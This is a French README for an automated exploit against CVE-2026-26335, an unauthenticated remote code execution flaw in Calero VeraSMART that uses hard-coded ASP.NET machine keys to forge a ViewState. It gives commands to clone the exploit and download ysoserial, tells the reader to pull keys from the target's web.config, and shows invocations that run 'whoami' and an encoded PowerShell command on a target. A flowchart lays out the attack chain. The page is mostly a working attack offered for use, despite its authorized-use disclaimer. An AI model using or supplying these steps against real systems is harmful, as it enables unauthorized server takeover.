
Exploit automatisé pour CVE-2026-26335, une RCE critique non authentifiée dans Calero VeraSMART via un ViewState ASP.NET falsifié utilisant des clés machine statiques. Inclut la découverte de points de terminaison, la génération de charges utiles et l'exécution de commandes.
Mohammed Idrees Banyamer Chercheur en sécurité
CVE‑2026‑26335 est une vulnérabilité critique d'exécution de code à distance non authentifiée dans Calero VeraSMART (avant 2022 R1).
L'application utilise des clés machine ASP.NET statiques codées en dur partagées entre les installations.
Un attaquant disposant de ces clés peut forger un ViewState ASP.NET malveillant et déclencher une désérialisation côté serveur → RCE.
Cet exploit automatise :
__VIEWSTATEGENERATORCWE‑321 — Clés cryptographiques codées en dur
Les déploiements VeraSMART réutilisent une machineKey ASP.NET identique :
<machineKey validationKey="STATIC_KEY"
decryptionKey="STATIC_KEY"
validation="SHA1"
decryption="AES" />
Tout attaquant disposant des clés d'une installation peut attaquer toutes les autres.
git clone https://github.com/mbanyamer/CVE-2026-26335-VeraSMART-RCE.git
cd CVE-2026-26335-VeraSMART-RCE
wget https://github.com/pwntester/ysoserial.net/releases/latest/download/ysoserial.exe
Les clés ne sont pas publiques. Obtenez-les depuis la cible :
C:\Program Files (x86)\Veramark\VeraSMART\WebRoot\web.config
Ou via la lecture de fichier complémentaire :
CVE‑2026‑26333
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY --check-only -v
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY -c "whoami"
python3 exploit.py -t https://target-ip -vk KEY -dk KEY -e /Login.aspx -c "powershell -enc ZQBjAGgAbwAgAEgAYQBjAGsAZQBkAA=="
python3 exploit.py -t https://target-ip -vk KEY -dk KEY --proxy http://127.0.0.1:8080 -v
9.8 — Critique AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Corrigé dans VeraSMART 2022 R1 :
Solutions de contournement :
À des fins éducatives et de tests autorisés uniquement. Utilisez uniquement sur des systèmes que vous possédez ou pour lesquels vous avez l'autorisation d'évaluer.
Mohammed Idrees Banyamer Chercheur en sécurité
Le schéma suivant illustre la chaîne d'exploitation de CVE‑2026‑26335 dans Calero VeraSMART, où les clés machine ASP.NET statiques permettent de forger un ViewState malveillant conduisant à une exécution de code à distance.
flowchart LR
A[Attaquant] --> B[Obtenir la machineKey VeraSMART]
B --> C[Découvrir le point de terminaison ViewState]
C --> D[Extraire __VIEWSTATEGENERATOR]
D --> E[Générer un ViewState malveillant via ysoserial]
E --> F[Signer la charge utile avec machineKey]
F --> G[Envoyer une requête POST forgée]
G --> H[Désérialisation ViewState ASP.NET]
H --> I[Gadget TypeConfuseDelegate]
I --> J[Exécution de code à distance sur IIS]